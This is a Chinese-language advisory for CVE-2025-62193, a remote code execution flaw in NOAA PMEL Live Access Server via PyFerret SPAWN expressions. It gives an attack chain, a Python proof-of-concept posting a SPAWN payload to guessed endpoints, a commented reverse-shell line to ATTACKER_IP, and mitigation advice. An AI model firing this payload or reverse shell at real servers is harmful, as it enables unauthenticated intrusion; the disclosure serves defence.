CVE-2025-62193: NOAA PMEL LAS远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-62193

漏洞类型

远程代码执行(RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NOAA PMEL Live Access Server (LAS)

漏洞概述

CVE-2025-62193是NOAA PMEL Live Access Server (LAS)中的一个严重远程代码执行漏洞，CVSS评分高达9.8分（严重级别）。该漏洞允许远程未认证攻击者通过发送特制的请求，在目标服务器上执行任意操作系统命令。漏洞根源在于LAS应用程序在处理用户输入时，未对PyFerret表达式进行充分的输入验证和安全过滤，攻击者可利用SPAWN命令触发系统级命令执行。此漏洞影响在网络上运行的所有LAS实例，攻击者无需任何认证凭证即可实现入侵，一旦被利用可能导致数据泄露、系统完全沦陷等严重后果。该漏洞于2025年1月15日披露，修复版本于2025年9月24日发布。

技术细节

该漏洞存在于gov.noaa.pmel.tmap.las.filter.RequestInputFilter.java文件中。攻击者构造包含PyFerret表达式的特制HTTP请求，利用LAS内置的PyFerret解释器功能。当请求被服务器处理时，恶意表达式中的SPAWN命令会被传递给底层操作系统执行，从而实现任意命令执行。由于RequestInputFilter类在2025-09-24之前的版本中缺乏对PyFerret表达式内容的严格过滤和验证，攻击者可以在表达式中嵌入系统命令（如反弹shell、文件下载等），由服务端执行。攻击过程完全在服务端进行，攻击者只需构造特定的HTTP请求参数或URL即可触发漏洞，无需任何身份认证或用户交互。

攻击链分析

STEP 1

步骤1

攻击者识别运行NOAA PMEL LAS的目标服务器，通过端口扫描或搜索引擎发现暴露的LAS实例

STEP 2

步骤2

攻击者构造包含PyFerret表达式的恶意请求，利用SPAWN命令注入操作系统命令

STEP 3

步骤3

特制请求被发送到LAS服务器的RequestInputFilter组件，该组件在2025-09-24之前的版本缺乏充分过滤

STEP 4

步骤4

服务器解析PyFerret表达式时，SPAWN命令被传递到系统 shell 执行，导致任意命令执行

STEP 5

步骤5

攻击者成功执行系统命令，可进一步部署后门、窃取数据或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-62193 PoC - NOAA PMEL LAS RCE via PyFerret SPAWN command
# Target: NOAA PMEL Live Access Server (LAS)
# This PoC demonstrates remote code execution via PyFerret expressions

target_url = "http://target-server/las"

# Malicious PyFerret expression with SPAWN command to execute OS command
# Replace 'whoami' with desired command
payload = "SPAWN('whoami')"

# Construct the exploit request
# The exact endpoint and parameter name may vary based on LAS configuration
params = {
    "variable": payload,
    # Alternative attack vector using different parameter
    "expression": payload,
    "cmd": payload
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0"
}

print(f"[*] Targeting: {target_url}")
print(f"[*] Payload: {payload}")

try:
    # Try different attack vectors
    for endpoint in ["/data", "/request", "/service", "/proxy"]:
        url = f"{target_url}{endpoint}"
        response = requests.post(url, data=params, headers=headers, timeout=10)
        print(f"[+] Request sent to {url}, Status: {response.status_code}")
        if response.status_code == 200:
            print(f"[*] Response preview: {response.text[:500]}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# For reverse shell:
# payload = "SPAWN('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1')"

影响范围

NOAA PMEL LAS < 2025-09-24版本

gov.noaa.pmel.tmap.las.filter.RequestInputFilter.java < 2025-09-24

防御指南

临时缓解措施

在无法立即升级的情况下，可通过以下措施临时缓解：1) 在网络边界配置访问控制策略，禁止外部用户访问LAS服务；2) 在反向代理或WAF层添加规则，拦截包含SPAWN、exec、system等危险关键词的请求参数；3) 临时禁用PyFerret表达式解析功能（如果业务允许）；4) 启用详细的访问日志和告警机制，实时监控可疑请求。建议尽快安排计划内维护完成版本升级。